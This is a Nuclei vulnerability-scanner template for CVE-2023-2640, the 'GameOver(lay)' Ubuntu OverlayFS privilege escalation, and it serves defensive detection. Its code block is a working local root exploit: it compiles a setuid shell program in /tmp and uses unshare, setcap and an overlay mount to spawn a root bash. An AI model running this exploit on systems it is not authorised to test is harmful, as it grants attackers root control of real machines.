nuclei-templates/code/cves/2023/CVE-2023-2640.yaml

58 lines
2.6 KiB
YAML

id: CVE-2023-2640
info:
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
author: princechaddha
severity: high
description: |
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
impact: |
An attacker with local access can gain elevated privileges on the affected system.
remediation: |
Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
reference:
- http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640
- https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability
- https://ubuntu.com/security/notices/USN-6250-1
- https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-2640
cwe-id: CWE-863
epss-score: 0.00232
epss-percentile: 0.60636
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
shodan-query: cpe:"cpe:2.3:o:canonical:ubuntu_linux"
tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical
self-contained: true
code:
- engine:
- sh
- bash
source: |
id
- engine:
- sh
- bash
source: |
cd /tmp
echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
gcc test.c -o test
unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")'
condition: and
# digest: 490a004630440220115656a336b2d20b4c44fe1ade030de40d947cf0fd7fb8f8a5a910dca2ab200602205ead45f6f081b3555a7924050cd922e13d30139e64254790b1368627d59b4389:922c64590222798bb761d5b6d8e72950